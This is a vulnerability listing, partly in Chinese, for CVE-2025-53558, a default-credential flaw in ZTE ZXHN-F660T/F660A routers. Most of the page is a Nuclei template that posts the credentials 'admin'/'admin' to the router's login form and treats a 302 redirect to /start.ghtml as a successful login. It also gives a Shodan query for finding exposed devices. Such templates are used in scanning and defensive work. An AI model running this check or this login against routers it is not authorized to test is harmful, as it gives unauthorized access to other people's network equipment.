CVE-2025-53558: ZTE ZXHN-F660T/F660A - Default Credentials

日期: 2025-08-01 | 影响软件: ZTE ZXHN-F660T | POC: 已公开

漏洞描述

ZXHN-F660T and ZXHN-F660A provided by ZTE Japan K.K. use a common credential for all installations. With the knowledge of the credential, an attacker may log in to the affected devices.

PoC代码[已公开]

id: CVE-2025-53558

info:
  name: ZTE ZXHN-F660T/F660A - Default Credentials
  author: DhiyaneshDK
  severity: high
  description: |
    ZXHN-F660T and ZXHN-F660A provided by ZTE Japan K.K. use a common credential for all installations. With the knowledge of the credential, an attacker may log in to the affected devices.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53558
    - https://jvn.jp/en/jp/JVN66546573/
  metadata:
    shodan-query: title:"F660"
    verified: true
    max-request: 1
  tags: cve,cve2025,default-login,zte

variables:
  username: "admin"
  password: "admin"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}

        frashnum=&action=login&Frm_Logintoken=0&Username={{username}}&Password={{password}}

    matchers-condition: and
    matchers:
      - type: word
        part: location
        words:
          - "/start.ghtml"

      - type: status
        status:
          - 302

      - type: word
        part: body
        words:
          - "wrong username"
          - "User information is error"
        negative: true
# digest: 4a0a00473045022073427a7cc13856d8f5f4fa00d669009a1a335d314edaf14973d81ed5d536c933022100abbb20fb6b6b56b810238e5c33af5c3a404d047de606f673b4f5c6a1cde28b4a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐